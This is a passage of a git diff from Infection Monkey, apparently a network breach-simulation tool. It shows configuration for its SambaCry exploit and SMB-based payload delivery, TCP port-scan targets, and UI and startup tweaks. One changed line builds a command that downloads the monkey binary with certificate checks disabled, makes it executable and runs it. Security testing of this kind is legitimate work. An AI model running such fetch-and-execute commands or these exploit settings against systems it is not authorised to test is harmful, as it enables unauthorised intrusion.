"description": "Determines whether to use VBS or BITS to download monkey to remote machine"
|
||||
" (true=VBS, false=BITS)"
|
||||
}
|
||||
}
|
||||
},
|
||||
"sambacry": {
|
||||
"title": "SambaCry",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"sambacry_trigger_timeout": {
|
||||
"title": "SambaCry trigger timeout",
|
||||
"type": "integer",
|
||||
"default": 5,
|
||||
"description": "Timeout (in seconds) of SambaCry trigger"
|
||||
},
|
||||
"sambacry_folder_paths_to_guess": {
|
||||
"title": "SambaCry folder paths to guess",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
'/',
|
||||
'/mnt',
|
||||
'/tmp',
|
||||
'/storage',
|
||||
'/export',
|
||||
'/share',
|
||||
'/shares',
|
||||
'/home'
|
||||
],
|
||||
"description": "List of full paths to share folder for SambaCry to guess"
|
||||
},
|
||||
"sambacry_shares_not_to_check": {
|
||||
"title": "SambaCry shares not to check",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
"IPC$", "print$"
|
||||
],
|
||||
"description": "These shares won't be checked when exploiting with SambaCry"
|
||||
}
|
||||
}
|
||||
},
|
||||
"smb_service": {
|
||||
"title": "SMB service",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"smb_download_timeout": {
|
||||
"title": "SMB download timeout",
|
||||
"type": "integer",
|
||||
"default": 300,
|
||||
"description":
|
||||
"Timeout (in seconds) for SMB download operation (used in various exploits using SMB)"
|
||||
},
|
||||
"smb_service_name": {
|
||||
"title": "SMB service name",
|
||||
"type": "string",
|
||||
"default": "InfectionMonkey",
|
||||
"description": "Name of the SMB service that will be set up to download monkey"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"network": {
|
||||
"title": "Network",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"tcp_scanner": {
|
||||
"title": "TCP scanner",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"HTTP_PORTS": {
|
||||
"title": "HTTP ports",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "integer"
|
||||
},
|
||||
"default": [
|
||||
80,
|
||||
8080,
|
||||
443,
|
||||
8008,
|
||||
7001
|
||||
],
|
||||
"description": "List of ports the monkey will check if are being used for HTTP"
|
||||
},
|
||||
"tcp_target_ports": {
|
||||
"title": "TCP target ports",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "integer"
|
||||
},
|
||||
"default": [
|
||||
22,
|
||||
2222,
|
||||
445,
|
||||
135,
|
||||
3389,
|
||||
80,
|
||||
8080,
|
||||
443,
|
||||
8008,
|
||||
3306,
|
||||
9200,
|
||||
7001
|
||||
],
|
||||
"description": "List of TCP ports the monkey will check whether they're open"
|
||||
},
|
||||
"tcp_scan_interval": {
|
||||
"title": "TCP scan interval",
|
||||
"type": "integer",
|
||||
"default": 200,
|
||||
"description": "Time to sleep (in milliseconds) between scans"
|
||||
},
|
||||
"tcp_scan_timeout": {
|
||||
"title": "TCP scan timeout",
|
||||
"type": "integer",
|
||||
"default": 3000,
|
||||
"description": "Maximum time (in milliseconds) to wait for TCP response"
|
||||
},
|
||||
"tcp_scan_get_banner": {
|
||||
"title": "TCP scan - get banner",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Determines whether the TCP scan should try to get the banner"
|
||||
}
|
||||
}
|
||||
},
|
||||
"ping_scanner": {
|
||||
"title": "Ping scanner",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"ping_scan_timeout": {
|
||||
"title": "Ping scan timeout",
|
||||
"type": "integer",
|
||||
"default": 1000,
|
||||
"description": "Maximum time (in milliseconds) to wait for ping response"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"options": {
|
||||
"collapsed": True
|
||||
}
|
||||
}
|
|
@ -104,7 +104,7 @@ class ReportPageComponent extends AuthComponent {
|
|||
.then(res => res.json())
|
||||
.then(res => {
|
||||
res.edges.forEach(edge => {
|
||||
edge.color = edgeGroupToColor(edge.group);
|
||||
edge.color = {'color': edgeGroupToColor(edge.group)};
|
||||
});
|
||||
this.setState({graph: res});
|
||||
this.props.onStatusChange();
|
||||
|
|
|
@ -52,7 +52,7 @@ class RunMonkeyPageComponent extends AuthComponent {
|
|||
|
||||
generateLinuxCmd(ip, is32Bit) {
|
||||
let bitText = is32Bit ? '32' : '64';
|
||||
return `curl -O -k https://${ip}:5000/api/monkey/download/monkey-linux-${bitText}; chmod +x monkey-linux-${bitText}; ./monkey-linux-${bitText} m0nk3y -s ${ip}:5000`
|
||||
return `wget --no-check-certificate https://${ip}:5000/api/monkey/download/monkey-linux-${bitText}; chmod +x monkey-linux-${bitText}; ./monkey-linux-${bitText} m0nk3y -s ${ip}:5000`
|
||||
}
|
||||
|
||||
generateWindowsCmd(ip, is32Bit) {
|
||||
|
|
|
@ -2,4 +2,4 @@
|
|||
|
||||
cd /var/monkey
|
||||
/var/monkey/monkey_island/bin/mongodb/bin/mongod --quiet --dbpath /var/monkey/monkey_island/db &
|
||||
/var/monkey/monkey_island/bin/python/bin/python monkey_island/cc/main.py
|
||||
/var/monkey/monkey_island/bin/python/bin/python monkey_island.py
|
|
@ -1,3 +1,6 @@
|
|||
To get development versions of Monkey Island and Monkey look into deployment scripts folder.
|
||||
If you only want to run the software from source you may refer to the instructions below.
|
||||
|
||||
How to set up the Monkey Island server:
|
||||
|
||||
---------------- On Windows ----------------:
|
||||
|
|
Loading…
Reference in New Issue